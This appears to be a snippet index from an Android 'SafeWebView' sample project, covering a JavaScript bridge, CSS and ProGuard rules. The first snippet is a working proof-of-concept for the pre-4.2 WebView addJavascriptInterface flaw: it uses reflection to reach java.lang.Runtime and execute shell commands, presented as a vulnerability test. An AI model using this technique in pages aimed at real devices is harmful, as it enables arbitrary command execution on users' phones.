### JavaScript Android WebView Command Execution Test Source: https://github.com/seven456/safewebview/blob/master/sample/src/main/assets/unsafe_test.html This JavaScript snippet demonstrates a method to test for WebView vulnerabilities on Android devices, specifically targeting versions prior to 4.2.2. The `execute` function attempts to gain access to Java's `Runtime` class via reflection to run arbitrary commands (e.g., 'ls -l /mnt/sdcard/'). The `getContents` function reads the output from the executed command's input stream, and `onButtonClick` serves as an entry point to trigger the test, displaying the command output or an alert if the WebView is deemed safe. ```javascript function getContents(inputStream) { var contents = ""; var b = inputStream.read(); while(b != -1) { var bString = String.fromCharCode(b); contents += bString; b = inputStream.read(); } return contents; } function execute(cmdArgs) { for (var obj in window) { console.log(obj); if ("getClass" in window[obj]) { alert(obj); return window[obj].getClass().forName("java.lang.Runtime"). getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } } } function onButtonClick() { try { var p = execute(["ls", "-l", "/mnt/sdcard/"]); var contents = getContents(p.getInputStream()); var outStr = contents.replace(/\\n/g, "
"); document.write(outStr); } catch(e) { alert("WebView is Safe!"); } } ``` -------------------------------- ### Measuring Code Execution Time in Android via JavaScript Source: https://github.com/seven456/safewebview/blob/master/sample/src/main/assets/test.html Shows how to pass the current JavaScript timestamp to an Android method `Android.testLossTime` to measure the duration of an operation or test. ```JavaScript Android.testLossTime(new Date().getTime()); ``` -------------------------------- ### Displaying Toast Message from Android via JavaScript Source: https://github.com/seven456/safewebview/blob/master/sample/src/main/assets/test.html Demonstrates how to display a toast message on Android using a JavaScript call to the `Android.toast` method, typically for user feedback. ```JavaScript Android.toast('我是气泡'); ``` -------------------------------- ### CSS Styling for SafeWebView Elements Source: https://github.com/seven456/safewebview/blob/master/sample/src/main/assets/test.html Defines styles for various elements within the SafeWebView component, including padding, line height, background, text color, and word-break properties for entries, list items, and buttons. ```CSS .entry{ -webkit-padding-start: 30px; } .entry li { line-height: 29px; margin-left: -10px; } .entry li div{ margin-right: 10px; padding-left: 8px; padding-top: 8px; padding-bottom: 8px; background: #555555; color: white; word-break: break-all; -ms-word-wrap: break-word; word-wrap: break-word; line-height: 15px; font-size: 10pt; } .entry li button{ margin-top: 5px; width: 60px; height: 35px; color: #111111; } ``` -------------------------------- ### ProGuard Rules for Custom Java Object Interface Anti-Obfuscation Source: https://github.com/seven456/safewebview/blob/master/sample/proguard-android.txt This ProGuard rule ensures that the `RetJavaObj` class, which represents a custom Java object returned to the WebView page, is not obfuscated. This is crucial for JavaScript to correctly interact with and receive data from the Java layer. ```ProGuard -keepclassmembers class android.webkit.safe.sample.JavaScriptInterface$RetJavaObj{ *; } ``` -------------------------------- ### Asynchronous JavaScript Callback from Android Method Source: https://github.com/seven456/safewebview/blob/master/sample/src/main/assets/test.html Illustrates an asynchronous callback mechanism where a JavaScript function is passed to an Android method `Android.delayJsCallBack`, which then invokes the JavaScript function after a specified delay, enabling delayed execution or event handling. ```JavaScript Android.delayJsCallBack(3 * 1000, 'call back haha', function (msg) { Android.toast(msg); }); ``` -------------------------------- ### ProGuard Rules for Gson Anti-Obfuscation Source: https://github.com/seven456/safewebview/blob/master/sample/proguard-android.txt These ProGuard rules prevent obfuscation for Gson-related classes, ensuring proper serialization and deserialization of JSON data within the application. It specifically keeps `*Annotation*` attributes, `sun.misc.Unsafe`, application-specific entities, and `com.google.gson.stream` classes. ```ProGuard -keepattributes *Annotation* -keep class sun.misc.Unsafe { *; } -keep class com.idea.fifaalarmclock.entity.*** -keep class com.google.gson.stream.** { *; } ``` -------------------------------- ### ProGuard Rules for JavaScript Interface Class Anti-Obfuscation Source: https://github.com/seven456/safewebview/blob/master/sample/proguard-android.txt This ProGuard rule prevents obfuscation of the `JavaScriptInterface` class itself. This class is typically injected into an Android WebView to allow JavaScript to call Java methods, and keeping its members unobfuscated is vital for proper communication. ```ProGuard -keepclassmembers class android.webkit.safe.sample.JavaScriptInterface{ *; } ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.